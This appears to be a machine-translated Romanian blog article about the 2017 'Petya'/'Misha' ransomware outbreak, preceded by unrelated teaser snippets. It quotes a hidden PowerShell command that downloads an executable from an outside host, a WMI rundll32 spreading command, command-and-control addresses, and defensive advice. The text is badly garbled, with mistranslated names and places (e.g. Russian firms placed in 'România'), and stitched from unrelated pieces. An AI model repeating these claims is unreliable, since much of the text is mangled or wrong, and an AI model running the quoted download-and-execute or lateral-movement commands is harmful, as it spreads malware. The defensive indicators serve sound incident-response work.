Malware „Petru“ și „Misa“, se întâmplă și ce să facă

articol special

În prezent, securitatea informațiilor este un foarte puternic de auto-direcție de automatizare corporative. Firește, în astfel de circumstanțe, direcția este mai strâns legată de problemele de aplicare a informațiilor ...

Până în prezent, securitatea resurselor companiei este unul dintre obiectivele prioritare pentru orice companie, indiferent de mărimea și domeniul de aplicare al activităților. piață de securitate a informațiilor este în creștere, ceea ce înseamnă că ...

Turism de afaceri, prin dezvoltarea pe care calitatea vieții ar trebui să fie crescută, se potrivește bine cu conceptul de „oraș inteligent“. În plus, nivelul de utilizare a tehnologiilor informaționale în industrie în ultimii cincisprezece la douăzeci de ani ...

Motivul pentru scrierea blog-ul a devenit deja al doilea în cursul anului un focar masiv virus. Și a fost un precedent foarte neplăcut. La urma urmei, o astfel de infecție pe scară largă nu a fost un timp foarte lung. Cu toate acestea, această situație era de așteptat. Epidemia a provocat ...

Pe Internet, o nouă epidemie - viruși novosobrannye codoare „Petru» (Petia) și „Misa» (Misa), sa răspândit deja peste zeci de companii mari din întreaga lume.

Dar modelul de criptare sa schimbat în mod semnificativ. „Petru“, pătrunzând în computer folosind exploit pentru a infecta sistemul MBR (Master Boot Record). Și apoi cizme de sistem „Misha“, care criptează fișierele de pe disc, și necesită o răscumpărare de 300 $ pe calculator. Deoarece există o modificare, atunci când „Petru“ și „Mike“ funcționează independent unul de altul, în funcție de faptul dacă privilegiile de administrator de sistem. Există rapoarte care le-a întâlnit, de asemenea, modelul de propagare folosind atașamente rău intenționate de travestiți în fișiere PDF.

Acest duo rău intenționat a trimis deja într-un knock-out multe site-uri CSI și a oprit activitatea multor companii. Conform rapoartelor mass-media din România cele mai mari probleme întâlnite în societate „Rosneft“, în prezent, pe principalele site-uri și site-ul corporativ al „Bashneft“. Cu toate acestea, informații cu privire lipsite de ambiguitate ce este „Petru“ și „Misa“, totuși. Criptograf nu a fost studiată. Potrivit «Dr. compania antivirus Web », cifrul foloseste un model diferit de distribuție. Cu toate acestea, fereastra de vedere vizual șantajist este identic cu „Petya“ și „Misha“.

infestarea masă înregistrată în Franța, Spania, România și țările CSI. În Ucraina, virusul a afectat zeci de organizații guvernamentale și comerciale.

fișierul următor omul meu. xls declanșată de% Windir% \ System32 \ mshta. exe „«C: .. \ xls hta omul meu»și cauzele de executare PowerShell-skrita, încărcarea corpului de malware:

PowerShell. exe -WindowStyle ascunse (.. New Object-Net WebClient) .DownloadFile ( 'h11p: // franceză-gătit com / exe .. omul meu', '% APPDATA% \ 10807.exe'); „(PID: [id proces], context suplimentar: (.. net WebClient) .DownloadFile ( 'h11p: // franceză-gătit com / exe .. omul meu', '% APPDATA% \ [număr aleatoriu] .exe');)

Apoi, malware-ul încearcă să se conecteze la servere și 111.90.139.247:80 COFFEINOFFICE. XYZ: 80, care poate un server de gestionare.

Indicatori de compromis este prezența fișierelor:

După montarea pe gazdă scanarea alte mașini Windows pe rețea și distribuirea datorită vulnerabilităților descrise în MS17-010 (același ca cel folosit WannaCry) per tcp port de: 135, tcp: 139, tcp: 445, tcp: 1024-1035.

Spread-ul poate apărea, de asemenea, datorită performanțelor echipei:

Remote WMI, "apel de proces a crea" C: \\ Ferestre \\ \\ System32 rundll32.exe "C:. \\ \\ Ferestre perfc DAT" # 1 "

Cum de a evita infecția? 1) Interzice accesul la serverele prin http: franceză-gătit. com: 80 84.200.16.242:80 111.90.139.247:80 COFFEINOFFICE. XYZ: 80

2) Disallow atașamente de e-mail și descărcarea de fișiere cu numele: Peter. APX, omul meu. exe, omul meu. xls, ordinii de [orice dată] .doc

4) Reglați IPS pentru a exploata de blocare pentru MS17-010

5) Pentru a proteja încă nu a fost gazdele infectate pot crea un fișier c: \ windows \ perfc fără o extensie. nu se produce infecții ale acestor noduri.